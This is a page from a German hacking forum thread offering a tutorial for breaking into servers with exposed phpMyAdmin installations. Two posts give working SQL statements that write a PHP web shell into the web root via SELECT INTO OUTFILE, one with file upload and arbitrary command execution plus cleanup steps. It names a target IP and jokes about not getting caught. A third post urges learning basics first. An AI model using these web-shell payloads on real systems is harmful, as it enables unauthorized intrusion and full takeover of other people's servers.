Seite 3 von 3 ErsteErste 123
Ergebnis 31 bis 33 von 33

Thema: (FTP) Richtig Scannen und Cracken - Str0s TuT

  1. #31
    Anfänger Avatar von BUSTER
    Registriert
    Mar 2015
    Beiträge
    4
    Gefällt mir!
    10
    Du gefällst: 11
    Tool,die ihr braucht
    Browser
    Shell
    Scannz

    Also, zuerst scannt ihr.Tut gepostet
    Die Results sehen dann z.B. so aus:

    129.120.43.132 HTTP Request FOUND (200 OK)

    Wenn ihr einen solchen scan habt geht ihr auf:

    http:\\129.120.43.132\phpmyadmin\phpinfo.php

    Dort guckt ihr erstmal ob das System Windows NT hat.
    Danach guckt ihr unter _SERVER["DOCUMENT_ROOT"] und
    Kopiert dort den Pfad der dort steht.

    Das Document_Root tragt ihr dann in die Shell hier ein:


    code:

    INSERT INTO shell (text) values ('<? $cmd = $_REQUEST["-cmd"];
    ?><html><head><title>SH3LL</title></head><body bgcolor=#000000 text=#FFFFFF"
    onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST> <input type=TEXT
    name="-cmd" size=64 value="<?$cmd?>" tyle="background:#000000;color:#FFFFFF;"><pre><?
    if ($cmd != ""; ) print Shell_Exec($cmd); ?></pre></form></body></html>'); SELECT * INTO OUTFILE 'HIERDASDOCUMENTROOT\shell.php' from shell;
    FLUSH LOGS


    Dann geht ihr auf:
    http:\\129.120.43.132\phpmyadmin\index.php

    Ihr klickt dann auf Datenbanken (Befindet sich links bei der Index.php)
    Ihr wechselt dann auf die Datenbank Mysql und tragt da folgenden Sql befehl ein:

    CREATE TABLE shell (text text);

    Ihr habt dann eine Table erstellt die shell heißt.
    Dann wechselt ihr in die Table und fügt dann als Sql befehl die oben geschriebene
    Shell ein.

    Wenn der Befehl erfolgreich war geht auf:

    http:\\129.120.43.132\shell.php

    Dort befindet sich eine cmd zeile.
    Dann könnt ihr den Server ganz normal hacken wie bei MSSQL





    +++++++++++++++++++++++++++++++++++++++++++



    Hacken ist gefährlich und man sollte es nur mit bedacht tun !
    Hacken ist strafbar und man sollte sich nicht erwischen lassen !
    Hacken ist nichts für kleine Script-Kiddies die keinen Plan haben !

    ++++++++++++++++++++++++++++++++++++++++++++++++

  2. Diesen Mitgliedern gefällt dieser Beitrag:


  3. Werbung - Hier werben?
  4. #32
    Junior Avatar von knusi
    Registriert
    Sep 2015
    Beiträge
    41
    Gefällt mir!
    7
    Du gefällst: 25
    wozu die datenbank, buster?
    es gibt doch auch server da hat man kein recht, eine db anzulegen - brauchst du ja auch nicht.

    es reicht, wenn du dir bei /pma/sql.php über select @@datadir oder select @@basedir das docroot anzeigen lässt und dann
    SELECT SHELLCODE INTO OUTFILE '/var/www/shell.php' ; --
    eingibst. bzw dann das docroot aus dem entsprechenden fall. das anlegen einer datenbank ist in keinem fall notwendig und wenn, kann man dies auch in einem schritt machen:

    Code:
    CREATE DATABASE ficker;
    use ficker;
    CREATE TABLE shell (codetab text);
    
    INSERT INTO shell(codetab) VALUES ('Upload your file:<form enctype="multipart/form-data" action="<?php print $_SERVER["PHP_SELF"];?>" method="post"><input type = "hidden" name = "MAX_FILE_FILE" value = "3096000" /><input type = "file" name = "fileupload"><input type = "submit" value = "Upload!"></form><?php $uploaddir = getcwd() ."\\\\\\\\"; $uploadfile = $uploaddir.basename($_FILES["fileupload"]["name"]); print "<pre>"; if (move_uploaded_file($_FILES["fileupload"]["tmp_name"],$uploadfile)){print " File stored ok...";} print "</pre>"; ?><hr>CMD: <? $cmd = $_REQUEST["-cmd"]; ?> <html><head><title>Got Shell?</title><style type="text/css"><!-- body {color: #CC0000;background-color:#000000;} --></style></head><body> <onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"> <input type = "submit" value ="Exec"><hr> <pre> <? if($cmd != "") print Shell_Exec($cmd); ?> </pre></form></body></html>
    ');
    SELECT * INTO OUTFILE '/var/www/shell.php'FROM shell;
    FLUSH LOGS ;
    DROP DATABASE `ficker`

    bin eher so das bequeme scriptkiddie
    Geändert von knusi (24.09.2015 um 10:47 Uhr)

  5. Diesen Mitgliedern gefällt dieser Beitrag:


  6. #33
    Anfänger
    Registriert
    Oct 2015
    Beiträge
    1
    Gefällt mir!
    5
    Du gefällst: 2
    da wir hier ja mittlerweile bei pma angekommen sind, was gerade am anfang das sinnigste wäre, meines wissens nach, ist lesen dein bester freund; und nicht irgendwelche tut`s zum thema hacking sondern erstmal die grundlagen. klein anfangen bring einen oftmals weiter, auch wenns länger dauert. ohne das wissen, was ist sql und was tu ich damit, wirst du keinen echten einstieg finden. alles was du dann findest wir nur cryptisches gelaber sein bei dem du nur bahnhof verstehst. daher kauf dir ein paar bücher (ja wirklich kaufen) mit denen du lernen kannst wie eine datenbak aufgebaut ist und man sie erstellt/verwaltet.
    aber auch das ist vielleicht schon ein schritt zuviel am anfang für dich.
    was du sagtest mit dem linux auf deinem laptop ist ein sehr guter anfang. aber auch da solltest du den desktop erstmal abschalten und das system nur über die kommandozeile benutzen / verwalten. denn klickibunti wirst du in den meisten standart tools nicht finden die es gibt, und wenn du da schon vor einem unüberwindbaren hinderniss stehst ..... ja. dann hast eben ein problem und musst wieder fragen stellen, die man sich selbst beantworten/erarbeiten sollte, um auch zu zeigen das man es wirklich lernen will; und nicht nur 3 klicks machen will zum stro.
    das gui baust du dir dann irgenwann selber für die bestehenden tools oder schreibst vielleicht sogar deine eigenen, für die du am ende auch nen gui baust.
    und glaub mir, diese tools wirst du auch nicht einfach verschenken an jeden der einfach mal danach fragt.

    bitte nicht falsch verstehn, ich denke schon das du lernen willst, aber der ansatz ist an der falschen stelle. ich selber bin auch nicht sehr viel weiter als du, aber ich habe gelernt, dass man sich dieses wissen nich in ein paar nächten durch tut's lesen aneignen kann ohne das nötige hintergrund wissen.
    lange rede, kurzer sinn: hoffe du findest deinen weg, nur nimm keine abkürzungen, die werfen dich mehr zurück als das sie dich nach vorne bringen

    so long
    trickydicky

  7. Diesen Mitgliedern gefällt dieser Beitrag:


Seite 3 von 3 ErsteErste 123

Ähnliche Themen

  1. nicht sichtbaren Link auf Homepage scannen/finden ?
    Von Batista im Forum Mainstream Talk & OffTopic
    Antworten: 8
    Letzter Beitrag: 16.07.2020, 12:54
  2. Firefox - richtig einstellen!
    Von Scotty im Forum Gefällt mir!
    Antworten: 8
    Letzter Beitrag: 03.09.2017, 06:23
  3. (PHP) - RegEx Hilfe Twig Templates nach Sprach Strings scannen
    Von darkness im Forum Entwicklung / Programmierung
    Antworten: 7
    Letzter Beitrag: 09.06.2015, 06:30

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
SzeneBox.org... im Mittelpunkt der Szene!
© since 2015 szeneBOX.org - All Rights Reserved
Domains: www.szenebox.org